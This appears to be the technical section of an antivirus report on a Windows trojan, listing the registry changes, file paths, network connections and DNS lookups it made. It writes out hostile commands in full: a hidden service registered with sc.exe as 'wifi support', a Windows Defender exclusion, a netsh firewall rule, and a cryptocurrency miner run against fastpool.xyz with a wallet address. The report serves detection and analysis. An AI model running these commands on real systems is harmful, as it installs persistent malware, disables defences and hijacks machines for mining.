Technical Information
- [<HKLM>\System\CurrentControlSet\Services\xbwvmwtp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\xbwvmwtp] 'ImagePath' = '%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\xbwvmwtp] 'ImagePath' = '%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe'
- 'xbwvmwtp' %WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d"<Full path to file>"
- 'xbwvmwtp' %WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\xbwvmwtp' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\lfbhscua.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\lfbhscua.exe to %WINDIR%\syswow64\xbwvmwtp\lfbhscua.exe
- 'de###twax.ru':443
- 'sh########l.mx.a.cloudfilter.net':25
- 'as##.tpg.com.au':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx.#xy.top':25
- 'in#####.mail.nethere.net':25
- 'mx#.#ate.com':25
- 'gi#####.##il.protection.outlook.com':25
- 'MX.#####l.smarshmail.com':25
- 'fa###ool.xyz':10060
- 'mg####01.vircom.com':25
- 'mx#.##tsolmail.net':25
- '15#.#01.1.224':443
- 'mx##.#indstream.net':25
- 'ALT1.ASPMX.L.GOOGLE.COM':25
- 'mx.###intpcs.com':25
- 'mx###.#kymail.net.br':25
- 'mx#######e02.gslb.pphosted.com':25
- 'ma##.#wisscom.com':25
- 'mx###.###east.atmailcloud.com':25
- 'go###e.co.jp':443
- 'fu#####ter4.fullnet.net':25
- 'si###com.com':25
- 'mx#######c03.gslb.pphosted.com':25
- 'ma##.#illdotcom.com':25
- 'ma##.#ailerhost.net':25
- 'mx.##teria.pl':25
- 'mx##.mail.com':25
- 'ma##.#irtexco.com':25
- 'ma##.#-email.net':25
- '5.##.37.41':427
- 'de###twax.ru':483
- 'mx#.#smcom.com':25
- 'mx#.#omcast.net':25
- 'sa#########.mail.protection.outlook.com':25
- 'sm##.##cureserver.net':25
- 'mx##.##rnetsecurity.com':25
- 'al######x-vip1.prodigy.net':25
- '19#.#6.146.42':427
- '19#.#6.146.43':427
- '19#.#6.146.41':427
- '95.##6.195.92':427
- '21#.#27.140.23':427
- 'google.com':80
- 'alt2.aspmx.l.google.com':25
- 'cl#####6.netcore.co.in':25
- 'mx.######mail.rediff.akadns.net':25
- 'mx##.##il.icloud.com':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'cu#######-2.in.mailcontrol.com':25
- 'mt##.##0.yahoodns.net':25
- 'jo########m-com.p10.mxthunder.com':25
- 'mx.##.#tinternet.com':25
- 'ma#####shal.carsoup.com':25
- 'ap##########in.mail.protection.outlook.com':25
- 'as##.#inet.net.au':25
- 'cl######g.mailcontrol.com':25
- 'ma##.#otmal.co.uk':25
- http://www.google.com/
- 'de###twax.ru':443
- 'ma##.#-email.net':25
- 'cl######g.mailcontrol.com':25
- 'as##.tpg.com.au':25
- 'mx.#xy.top':25
- 'in#####.mail.nethere.net':25
- 'aspmx.l.google.com':25
- 'gi#####.##il.protection.outlook.com':25
- 'fa###ool.xyz':10060
- 'mg####01.vircom.com':25
- 'mx#.##tsolmail.net':25
- '15#.#01.1.224':443
- 'ma##.#irtexco.com':25
- 'mx###.#kymail.net.br':25
- 'go###e.co.jp':443
- 'fu#####ter4.fullnet.net':25
- 'si###com.com':25
- 'ma##.#illdotcom.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx.##teria.pl':25
- 'ap##########in.mail.protection.outlook.com':25
- 'ma#####shal.carsoup.com':25
- 'de###twax.ru':483
- '19#.#6.146.42':427
- '19#.#6.146.41':427
- '21#.#27.140.23':427
- '19#.#6.146.43':427
- '5.##.37.41':427
- '95.##6.195.92':427
- 'mx##.##rnetsecurity.com':25
- 'mx#.#smcom.com':25
- 'al######x-vip1.prodigy.net':25
- 'sa#########.mail.protection.outlook.com':25
- 'cl#####6.netcore.co.in':25
- 'mx.######mail.rediff.akadns.net':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mt##.##0.yahoodns.net':25
- 'mx.##.#tinternet.com':25
- 'jo########m-com.p10.mxthunder.com':25
- 'cu#######-2.in.mailcontrol.com':25
- 'ALT1.ASPMX.L.GOOGLE.COM':25
- DNS ASK de###twax.ru
- DNS ASK mx##.#indstream.net
- DNS ASK wi###tream.net
- DNS ASK ma##.#irtexco.com
- DNS ASK vi###xco.com
- DNS ASK ma###raph.de
- DNS ASK ha######oadssecurity.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK fa###ool.xyz
- DNS ASK sa#####ntadvisors.com
- DNS ASK mg####01.vircom.com
- DNS ASK vi##om.com
- DNS ASK MX.#####l.smarshmail.com
- DNS ASK sa#####ntadvisor.com
- DNS ASK gi#####.##il.protection.outlook.com
- DNS ASK gi#.net
- DNS ASK aspmx.l.google.com
- DNS ASK ex###com.com
- DNS ASK mx#.#ate.com
- DNS ASK na##.com
- DNS ASK in#####.mail.nethere.net
- DNS ASK ne##ere.com
- DNS ASK di######nnovationsny.com
- DNS ASK tp#.comau
- DNS ASK sh##om.com
- DNS ASK sp###tpcs.com
- DNS ASK mx.###intpcs.com
- DNS ASK ad###com.com
- DNS ASK ALT1.ASPMX.L.GOOGLE.COM
- DNS ASK cr#####w-schools.org
- DNS ASK mx.##teria.pl
- DNS ASK in##ria.pl
- DNS ASK ma##.#ailerhost.net
- DNS ASK sp##com.com
- DNS ASK ma##.#illdotcom.com
- DNS ASK wi###otcom.com
- DNS ASK on###intcom.com
- DNS ASK sp####photmail.com
- DNS ASK mx#######c03.gslb.pphosted.com
- DNS ASK si###com.com
- DNS ASK qu###antcom.com
- DNS ASK fu#####ter4.fullnet.net
- DNS ASK so###com.com
- DNS ASK go###e.co.jp
- DNS ASK mx###.###east.atmailcloud.com
- DNS ASK ma####reetcom.com
- DNS ASK st##com.com
- DNS ASK ma##.#wisscom.com
- DNS ASK sw###com.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK bm##om.com
- DNS ASK mx###.#kymail.net.br
- DNS ASK ho###l.co.uk
- DNS ASK mx.#xy.top
- DNS ASK nb###com.com
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK ic##ud.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK co###cola.com
- DNS ASK jo########m-com.p10.mxthunder.com
- DNS ASK jo###toncom.com
- DNS ASK mx.######mail.rediff.akadns.net
- DNS ASK re###fmail.com
- DNS ASK cl#####6.netcore.co.in
- DNS ASK vi###ntek.co.in
- DNS ASK google.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK at#.net
- DNS ASK mx##.##rnetsecurity.com
- DNS ASK ma###ncom.com
- DNS ASK sm##.##cureserver.net
- DNS ASK ne###nix.com
- DNS ASK sa#########.mail.protection.outlook.com
- DNS ASK sa##nsa.com
- DNS ASK mx#.#omcast.net
- DNS ASK co##ast.net
- DNS ASK mx#.#smcom.com
- DNS ASK cs##om.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK or####pharma.com
- DNS ASK as##.tpg.com.au
- DNS ASK tp#.com.au
- DNS ASK sh########l.mx.a.cloudfilter.net
- DNS ASK sh#w.ca
- DNS ASK mx##.mail.com
- DNS ASK us#.com
- DNS ASK oz###il.com.au
- DNS ASK ma##.#-email.net
- DNS ASK pr###com.com
- DNS ASK cl######g.mailcontrol.com
- DNS ASK se##lco.com
- DNS ASK ne####hinfocom.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK as##.#inet.net.au
- DNS ASK we###et.com.au
- DNS ASK ap##########in.mail.protection.outlook.com
- DNS ASK ap###ooledu.in
- DNS ASK ma#####shal.carsoup.com
- DNS ASK cu###com.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK bt###ernet.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ro###tmail.com
- DNS ASK cu#######-2.in.mailcontrol.com
- DNS ASK co#.net
- DNS ASK ma##.#otmal.co.uk
- '%WINDIR%\syswow64\xbwvmwtp\lfbhscua.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\xbwvmwtp\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfbhscua.exe" %WINDIR%\SysWOW64\xbwvmwtp\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create xbwvmwtp binPath= "%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description xbwvmwtp "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start xbwvmwtp' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\xbwvmwtp\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\lfbhscua.exe" %WINDIR%\SysWOW64\xbwvmwtp\
- '%WINDIR%\syswow64\sc.exe' create xbwvmwtp binPath= "%WINDIR%\SysWOW64\xbwvmwtp\lfbhscua.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description xbwvmwtp "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start xbwvmwtp
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half